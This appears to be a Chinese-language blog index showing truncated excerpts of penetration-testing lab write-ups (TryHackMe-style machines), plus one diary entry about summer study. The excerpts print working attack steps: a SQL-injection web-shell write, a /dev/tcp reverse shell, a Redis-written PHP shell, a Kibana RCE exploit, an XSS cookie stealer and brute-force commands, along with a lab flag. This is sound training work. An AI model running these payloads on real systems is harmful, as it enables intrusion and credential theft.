MikannseのSekai

端口扫描 扫出来好多端口。然而web服务扫不出来什么端口，访问也只有一张图片而已。SMB也枚举不出来东西，myql和远程桌面也都没有信息可以连接。完全没有任何头绪啊（悲 看WP，扫描了他的UDP端口 sudo nmap 10.10.140.97 -sUV --top-ports 10 -Pn 而且还要加上–top-ports 10扫描是个最常用的端口，否则还扫不出来233。 snmp发现了个snmp，然后可以用onesixtyone这个工具对他进枚举。snmp是一个对网络设备管理的服务，采取的是UDP协议。 onesixtyone 10.10.140.97 -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt 发现了一个叫做openview的社区名 snmp-check 10.10.88.208 -c openview 然后用snmp-check这个工具枚举一下这个社区名，发现了一个非默认的用户名 Getshell 之前我们发现5985端口开启，是一个winr ...

唔，竟然又过了一个月么。果然放假过得时间就是快，原本计划有好多事情打算做的，然而却因为学车完全没有时间（悲。学车真的是又无聊又浪费时间啊。所幸的事顺利通过了科目二和三，也就算了。在学车的过程中把《万延元年的FOOTBALL》看完了，又两三天把《献给阿尔吉农的花束》一口气看完了，真不错捏。倒是觉得对知识和智力的过分追求并不全是好事。又重新开始投入时间到编曲上了，真是有意思，但是还是碰到了很多问题呢，不过解决的过程也学到了很多东西。这一个月渗透测试的素养和水平可谓是大幅度提升的，与其说是知识上的增长，不如说是开始刷靶机后建立起了基础的整个渗透的框架和思路，将之前所学的零碎的知识点整合了起来。虽然对于域渗透和二进制方面暂时学得还有点吃力，打算补一些基础知识，但是渗透真的是有趣，一天不打靶机就浑身难受。假期的下一个月打算往渗透测试靶机开发的方面学习一下，能对一些背后的原理更加了解。嗯。但是不得不说最近又有一种虚无感了呢，大概是基本没出门的原因吧，八月份要好好地享受这个大一的暑假出去转转呢。过于追求做事的效率也不太好吧，反而欲速则不达，也失去了本身做这件事的乐趣~

端口扫描 Web 获取了一些目录，但是里面也没什么有用的东西。找不到什么其他的了，那就抓个包看一下 发现有个cookie，照常理来说没有账号身份验证什么的为什么会有cookie呢。 一开始的想法是能不能伪造cookie，但是没有其他任何信息，伪造不了，任意更改cookie后会提示错误的序号，也许存在一个数据库查询，输入一个’后报错。 ordery by 发现只有两列 有回显了，数据库名称叫webapp 表名就叫queue 有两个列，一个ID一个序号 成功得到所有用户的ID和序号，也许我们就能伪造成其他用户了 嘶，但事实上证明拿到这些并没有什么用… 就算伪造也只有几号的界面罢了。。。 不会了，WP！！ GetshellWP的方法是用SQL注入来写马到Web目录然后反弹shell ' INTO OUTFILE '/var/www/html/shell.php' LINES TERMINATED BY 0x3C3F706870206578656328222F62696E2F62617368202D63202762617368202D69203E202F6465762F7463 ...

端口扫描 Web 根目录是一些介绍，我们进入/admin，发现要登录，试了个admin:admin给了个提示说密码是个很重要的字母，后面跟2个数字和一个特殊字符 并且抓包发现密码是会被加密上传的，而且加密形式应该是MD5 密码爆破接下来我们要猜测密码了，既然他都给了提示。用户名应该是marco,提示估计也是在网页中寻找，可以用cewl工具来收集网页中的信息然后生成密码字典 cewl -w list.txt -d 5 -m 5 http://10.10.211.133/ 生成一个list字典，有大小写的区分，不过猜测房间应该不会难为我们，就先全转成小写的 vim lower.py 生成字典，我们可以用john 先编辑john的配置文件 sudo vim /etc/john/john.conf Shift＋G跳转到文本底部，添加上自定义的规则 [List.Rules:PigRule]Az"[0-9][0-9][!?#$%&/()=]" john --wordlist=listlower.txt --rules=PigRule --stdout>pass.txt ...

端口扫描 只有一个Web端口还有SMB服务 SMB因为Web进去发现要登录，我们现在又没有任何信息，所以先转向SMB。 enum4linux -a ip 发现一个共享但是无法访问 发现了两个用户，然后也就没什么信息了。 Web我们继续转到80端口，有了用户名，没其他信息，只能试着爆破了 发现登录框是GET请求，那用hydra的方式应该和之前POST表单不太一样 fox用户爆不出来，rascal可以 hydra -l rascal -P /usr/share/wordlists/rockyou.txt 10.10.88.192 http-get 貌似每次开启靶机的密码都不一样 发现是一个搜索系统 发现我们搜索的东西是以JSON类型上传的 而且他给我们显示了三个文件 抓包放到bp的重放器中，可以看到这个搜索的功能是在search.php执行的，我们可以猜测是一个命令执行语句 然后不会了，看WP！用的是JSON注入 上传类似于 {"target":"\";要执行的命令;\""} 想了好久，不太懂，在这位师傅写的文章理解了 https://blog.csdn.net/qq ...

端口扫描 ftp发现不能匿名登录，那攻击点就只剩下80端口了（对22端口直接进行攻击比较少） Web 进/assets目录看一下 一个rickrolled,难绷，看一下css文件 告诉了我们/sup3r_s3cr3t_fl4g.php 弹出一个警告框后发现跳转到了youtube，盲测是rickrolled，建议我们关掉js 火狐浏览器关闭JS 再次进入界面发现播放了刚刚那文件夹里的mp4文件，说视频中有Hint 因为之前访问那个php时有重定向，所有想先抓个包试试（网络太卡视频根本放不起来） 在第二个包中找到提示 GET /intermediary.php?hidden_directory=/WExYY2Cv-qU HTTP/1.1 访问/WExYY2Cv-qU 找到一张图片，额不会还有隐写罢。。。先把图wget下来 Getshell直接strings，发现有提示，告诉了一个FTP的用户名，然后一堆密码 创建一个密码字典，看样子要我们爆破了，可以用hydra,指定用户名来爆破 hydra -l ftpuser -P password.txt ftp://10.10.86.23 ...

端口扫描最近连thm的网络好像不太稳，nmap扫描也出了点问题。。。 Web 这界面和之前打的vulnhub那台好像，提示了cap的提权方式？ 扫目录没扫出什么东西，80端口就是没什么东西 搜了一下5601端口，发现是一个叫做kibana的服务，和这个房间的名字挺符合，访问看一下 进了一个管理界面 先看房间的第一个问题 在这个界面找到版本号 Getshell能直接搜到CVE https://github.com/LandGrey/CVE-2019-7609 开启监听 python2 CVE-2019-7609-kibana-rce.py -u http://10.10.234.34:5601 -host 10.14.52.15 -port 1234 --shell 成功连接 user.txt THM{1s_easy_pwn3d_k1bana_w1th_rce} 提权既然房间都提示那么明显了，就是用cap文件来提权 getcap -r 来递归列举全部cap文件 但最好把报错信息丢弃 getcap -r / 2>/dev/null 能用python3，直接 / ...

端口扫描 Webgobuster dir -u http://10.10.128.25/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 50 简单扫下目录 进主页翻了一下有一个登录和注册页面 /robots.txt进去一看告诉我们有一个/admin页面，但是进去提示未授权无法进入 尝试’ ，发现登录界面也没有注入点。那就想试着先注册一个账号登录 发现可以向管理员发送报告然后管理员会审查，像这种留言形式东西就试着看看有无XSS 在list界面提交一个XSS测试语句，提交后发现弹框，说明存在漏洞 按下F12，在网络界面我们可以看到当前账户有一个cookie，也就是说如果获取到管理员的cookie我们就能伪造管理员身份，而XSS漏洞正好能做这种事 https://github.com/lnxg33k/misc/blob/master/XSS-cookie-stealer.py 下载窃取cookie的Python脚本，原理是在本地开启一个服务器，然后管理员处理我们发 ...

端口扫描 Web打开网页，http和https的内容应该是一样的，是一个不明所以的内容，下面那些字母有点像化学元素？ 先扫一下目录 gobuster dir -u http://10.10.11.77/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 gobuster dir -u http://10.10.11.77/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 50 看了下WP 然后对照元素周期表列出原子序号 47 80 73 51 84 46 80 78 103 放cyberchef转ASCII码发现是一个文件，所以隐藏文件就是/PI3T.PNg 问谁是文件的创造者 先用wget把文件下下来 exiftool PI3T.PNg 可以查看图片信息，作者是Piet Mondrian 然后就是有一个叫做Piet的编程语言，用位图来写？相当抽象 根据THM提示 ...

端口扫描主机发现开启靶机后 sudo nmap -sn xxx.xxx.xxx.0/24 额外新增加主机的就是要进行渗透测试的机器 Web目录扫描一下80端口 这个manual目录倒是没什么东西，倒是在根目录发现了这一串注释 CTF常见的brainfuck编码，在线网站解下 https://www.splitbrain.org/services/ook .2uqPEfj3D<P’a-3 不知道有啥用，回到之前nmap扫到的CVE看看 登录20000端口看一下，需要输入用户名和密码 在端口扫描可以看到有SMB服务（139和445端口），我们可以用enum4linux来列举一下用户 enum4linux -a 192.168.162.140 发现一个叫cyber的用户 那我们用这个用户名和上面得到的密码来登录 Getshell找了一圈没找到上传文件的地方，结果发现有可以直接调用终端的地方 即便如此还是习惯用反弹shell，kali中开启监听，然后在web端的终端中执行 /bin/bash -i >& /dev/tcp/attack/port 0& ...

端口扫描 开放了http服务,但是扫不出任何东西。还有一个数据库，说实话这个redis数据库不是特别了解 上WP。。。 Getshell下载一个redis-cl,是redis的命令行管理工具 sudo apt-get install redis-tools redis-cli -h ip 进行连接 info可以查看一些信息 稍微学了一点redis的东西 我们首先将redis的工作目录设置在apache的html(nmap扫描结果可以得知是一个apache服务器) config set dir /var/www/html config set dbfilename shell.php 设置一个名叫shell.php的持久化文件，持久化应该是redis数据库的一个特性，这块知识之后再去补 set test "<?php system($_GET['cmd']); ?>" 设置一个键值对，键名为test,内容我们简易地先设为一句话木马测试一下 最后输入save将数据保存在持久化文件中 然后我们在浏览器中访问/shell.php,用cmd参数传一些命令上去看看 发现是 ...

扫了下端口，发现只有22和80两个端口 flag1(文件包含)先扫一下目录，因为要找flag，所以搜索一下php,html,txt之类的文件 gobuster dir -u http://10.10.102.87/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 60 gobuster dir -u http://10.10.102.87/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 60 登录进来发现是一个选择，随便选一个 因为发现有传参，试试看是否存在注入，发现报错，所以存在注入 还试了一下文件包含，发现没有，那就想试着用sqlmap跑跑看，发现也跑不出来 目录扫出来一个flag.php 想直接访问来着，发现是一片空白，读不出来，可能没有显示PHP的代码，那就试着用伪协议来读 提示说只能有狗或者猫，之前貌似做过这个，需要URL里出现dog或者cat 那就访问 ht ...